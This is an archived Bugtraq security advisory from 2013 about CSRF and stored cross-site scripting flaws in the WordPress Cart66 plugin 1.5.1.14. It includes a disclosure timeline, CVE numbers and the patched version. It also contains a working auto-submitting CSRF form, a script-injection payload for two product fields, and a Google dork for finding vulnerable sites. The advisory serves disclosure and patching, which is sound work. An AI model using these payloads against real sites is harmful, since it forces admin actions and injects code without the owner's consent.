[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
From: jsibley1@xxxxxxxxx
Date: Sat, 12 Oct 2013 03:42:37 GMT

# Exploit Title:     Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    September 29th 2013
# Vendor notified:   September 29th 2013
# Vendor fixed:      October 12 2013
# Vendor Homepage:   http://cart66.com
# Software Link:     
http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on:         Wordpress 3.6.1
# Google-dork:       inurl:/wp-content/plugins/cart66
# CVE (CSRF):        CVE-2013-5977
# CVE (XSS):         CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 
1.5.1.14.

Vulnerabilities:
1) CSRF
2) Code Injection

VULNERABILITY #1
************
*** CSRF ***
************
Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products

================
Proof of Concept
================

<html><body>
<form name="csrf_form" 
action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products";
 method="post" enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name='product[name]' id='product-name' 
value='absane was here' />
<input type='hidden' name='product[item_number]' id='product-item_number' 
value='1337' />
<input type='hidden' id="product-price" name='product[price]' value='13.37' />
<input type='hidden' id="product-price_description" 
name='product[price_description]' value='LuLz' />
<input type='hidden' id="product-is_user_price" name='product[is_user_price]' 
value='0' />
<input type="hidden" id="product-min_price" name='product[min_price]' value='' 
/>
<input type="hidden" id="product-max_price" name='product[max_price]' value='' 
/>
<input type='hidden' id="product-taxable" name='product[taxable]' value='0'>
<input type='hidden' id="product-shipped" name='product[shipped]' value='1'>
<input type="hidden" id="product-weight" name="product[weight]" value=""  />
<input type="hidden" id="product-min_qty" name='product[min_quantity]' value='' 
/>
<input type="hidden" id="product-max_qty" name='product[max_quantity]' value='' 
/>
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>

VULNERABILITY #2
***********************
*** Code Injection  ***
***********************
Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the 
following input fields:
* Product name
* Price description

================
Proof of Concept
================
In the vulnerable fields add <script>alert(0)</script> or any other code. The 
code is placed directly into the database.

Input is not sanatized and the code can be executed in ways that depend on the 
circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC 
JavaScript code was executed when I attempted to add a product or modify an 
existing product.


]....................................[
]..............SOLUTIONS.............[
]....................................[

Update to version 1.5.1.15 or greater.

Prev by Date: [SECURITY] [DSA 2778-1] libapache2-mod-fcgid security update
Next by Date: [CISTI'2014]: Call for Workshops
Previous by thread: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
Next by thread: [SECURITY] [DSA 2778-1] libapache2-mod-fcgid security update
Index(es):
- Date
- Thread